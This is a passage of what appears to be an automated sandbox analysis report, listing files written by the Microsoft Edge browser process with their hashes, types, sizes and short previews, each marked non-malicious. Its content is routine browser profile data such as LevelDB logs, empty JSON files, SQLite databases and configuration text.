                                                                                                                                                                                                                                                                                                                  SHA-512:A55C3E0AE9E417579817153C28930F8D4DEBBA8B0CC2893B96D5749CA22AF72DE3975DBDBE03060768E4CD2960190F34163D164E73B263A584C0457B3CA3766E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):324
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.249444117272332
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEjDq2PCHhJ23oH+Tcwt8aPrqIFUt8YEj2Zmw+YEZkwOCHhJ23oH+Tcwt8amLJ:knvBYebL3FUt8/K/+/Z56YebQJ
                                                                                                                                                                                                                                                                                                                  MD5:16460EA0DCECE3F40141BAC2E265D67A
                                                                                                                                                                                                                                                                                                                  SHA1:9CB6CA369B3881D6255B6D2167515FD6D6A98260
                                                                                                                                                                                                                                                                                                                  SHA-256:631E623619FC842164D54D9068895289F840F0A57C1AB3EF12DE2474E0CD7D1C
                                                                                                                                                                                                                                                                                                                  SHA-512:1A7C2F11865AAF5ADEEA86A45B63EFD8A8C3537ECD9C2BC9AD62B189E767F70BD7EF57F32B3A46921FF236B18C9529C3B1F48A6EA57B51B4C8C093F33A840F03
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.925 16b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/21-09:48:28.925 16b4 Recovering log #3.2024/11/21-09:48:28.926 16b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.237757122976113
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEPwq2PCHhJ23oH+Tcwt865IFUt8YEPRZmw+YEvKkwOCHhJ23oH+Tcwt86+ULJ:kovBYeb/WFUt8/5/+/S56Yeb/+SJ
                                                                                                                                                                                                                                                                                                                  MD5:8694901236594FD7CD08AF98658D7DF7
                                                                                                                                                                                                                                                                                                                  SHA1:F8F52FC5BA108ECE2F34F8990650A43698C9F4AE
                                                                                                                                                                                                                                                                                                                  SHA-256:D079A9660D1F4A0A3642A6C94E0F809EA4DA60E873C701FD724D50051A614EE3
                                                                                                                                                                                                                                                                                                                  SHA-512:FC6C7C44C09B24B8D3CBC9F2E2395DC160931AA9D9CD8B6D36CA53D7F490B50F61318C6C031B3606496062AAA403CB80AD757448EF7883BF37A752DDA11689C9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:28.928 16b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/21-09:48:28.928 16b4 Recovering log #3.2024/11/21-09:48:28.929 16b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):321
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.23092299989349
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HEJZ4q2PCHhJ23oH+Tcwt8NIFUt8YEJZJZmw+YEJZDkwOCHhJ23oH+Tcwt8+eLJ:kJ6vBYebpFUt8/Jz/+/Jp56YebqJ
                                                                                                                                                                                                                                                                                                                  MD5:48A3A10E1C60ADFB854F712A9797247F
                                                                                                                                                                                                                                                                                                                  SHA1:FAA5DFEC0093048950E81B7FA5F7E841279D3FBE
                                                                                                                                                                                                                                                                                                                  SHA-256:1D6058C07A17896222DA5F3FB8F793FF6FB56E4F656AA3C5A6C77B09B719FC56
                                                                                                                                                                                                                                                                                                                  SHA-512:EF5653CC6972904BBBD2E5A8FE05FB77F15440F7321988670ABD3BB5B77A6AD445961BCFD0756C2C1913A1F2368E5B0D0EF7280119E08A75BF4FD17B54E14A98
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.532 6c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/21-09:48:29.532 6c0 Recovering log #3.2024/11/21-09:48:29.532 6c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.6480676312452474
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0GJP/KbtRcdgam6ICQkQerTjl8hj773pLLRKToaAu:adbP/7gye23l8F7NRKcC
                                                                                                                                                                                                                                                                                                                  MD5:54029574E862D0DDC10FFBFC08C67E17
                                                                                                                                                                                                                                                                                                                  SHA1:44B5BF81F695474ECEE4F626BF8C4EC6C5BC0C7B
                                                                                                                                                                                                                                                                                                                  SHA-256:C120D58A74A14355670286D985557C55B5C1814C6FB068B55813741C5911E44D
                                                                                                                                                                                                                                                                                                                  SHA-512:D8BF6371FA2EF91F3733BCFA66F95F3EC64FE222A38F5B07EC57514A761ECF3BCC794F043313C0BC065DD836AABB4A83E435FC5D60D8FDC1664ADBE926540859
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):405
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.31260602196323
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kmZSVvBYeb8rcHEZrELFUt8/mZSg/+/mYSI56Yeb8rcHEZrEZSJ:kf5BYeb8nZrExg8/fNtSS6Yeb8nZrEZe
                                                                                                                                                                                                                                                                                                                  MD5:77E4DD6A4CB404C18E8AD6E603604EC2
                                                                                                                                                                                                                                                                                                                  SHA1:0F50257B19C3C8E9D2F3972D1B9DFC785FAEB118
                                                                                                                                                                                                                                                                                                                  SHA-256:CD3355062C0FD8B511BD83CF201F7DE2883B812D786B3D633E60C071015BC01C
                                                                                                                                                                                                                                                                                                                  SHA-512:493E934E1E8EC0EE2C8F893B1FECCCF1508398390F1F8D4CA011D70A04E82FB315E6ECAA2B3DB427B71BF179FBA80977F92818E7B41BB8AFA6CB83A36CB0AC0D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:32.346 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/21-09:48:32.346 d34 Recovering log #3.2024/11/21-09:48:32.347 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.20511841044185
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HELQDM+q2PCHhJ23oH+Tcwt8a2jMGIFUt8YELcgZmw+YELuJUGSDMVkwOCHhJ234:kh+vBYeb8EFUt8/h/+/qJUG3V56Yeb8N
                                                                                                                                                                                                                                                                                                                  MD5:1C6747946B6ADD36775EFCA1964A5A67
                                                                                                                                                                                                                                                                                                                  SHA1:8AFFECA70EFCAB095BC3ECA00C9EC9A899CA0F26
                                                                                                                                                                                                                                                                                                                  SHA-256:8D011C6B9E73A36E80C7C20F50DE078D66F9114BB28759C5269D1EC01419ABC6
                                                                                                                                                                                                                                                                                                                  SHA-512:539059467BB4B88EF5415FFC3BD4006FBB67291849D465BBA83C4293C1EAF17E829C84CB7846E5CF0EFCD42383FCA689599968D7268003ADAA7D9F963957B216
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.735 1c1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/21-09:48:29.739 1c1c Recovering log #3.2024/11/21-09:48:29.778 1c1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3522035045933645
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:TsKLopF+SawLUO1Xj8BLfWKgh8pwZEX0hpR71FX08:te+AuLpgh8fXoD7fX08
                                                                                                                                                                                                                                                                                                                  MD5:9D7BA9A2E4D5DC3E60D4DFBECD1E93B0
                                                                                                                                                                                                                                                                                                                  SHA1:7ADF0EDCEBBA39AE55F093A86E846EB10C94546E
                                                                                                                                                                                                                                                                                                                  SHA-256:167ADE8A21D0153BF1EB66FDDEE14AF92A28A73D50D7E87FE7F8BFA3070B5590
                                                                                                                                                                                                                                                                                                                  SHA-512:B4B35D981AF73C9CDDC0260E3D05F48559E457D465D05D89795E1AA5A98D0BCCC06302F388CF17BC2C6E8FEA234745D78DA1319DFE994ADE781DF47779ACEE21
                                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.4416238738239526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB4T+:uIEumQv8m1ccnvS6wF/mTpezt4s1a
                                                                                                                                                                                                                                                                                                                  MD5:2D2CA6B046183BE602AC1124766065F5
                                                                                                                                                                                                                                                                                                                  SHA1:77366051BA87ABB2B78039C8AAAB9C1459BA7F8E
                                                                                                                                                                                                                                                                                                                  SHA-256:1A1DBB247B7A9BE4E40783D68A272AC1DB374DDF2E1844E3E7BAC8CD4353F6D4
                                                                                                                                                                                                                                                                                                                  SHA-512:DF7FB18068034389B6A218E40957780DAE28D29B6991A52710DD50C0D77536A3C192D6FA6D1AB3B2D54CBF66C6FA48BD45E993136DF43286EF42190F97650E13
                                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:SQLite format 3
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
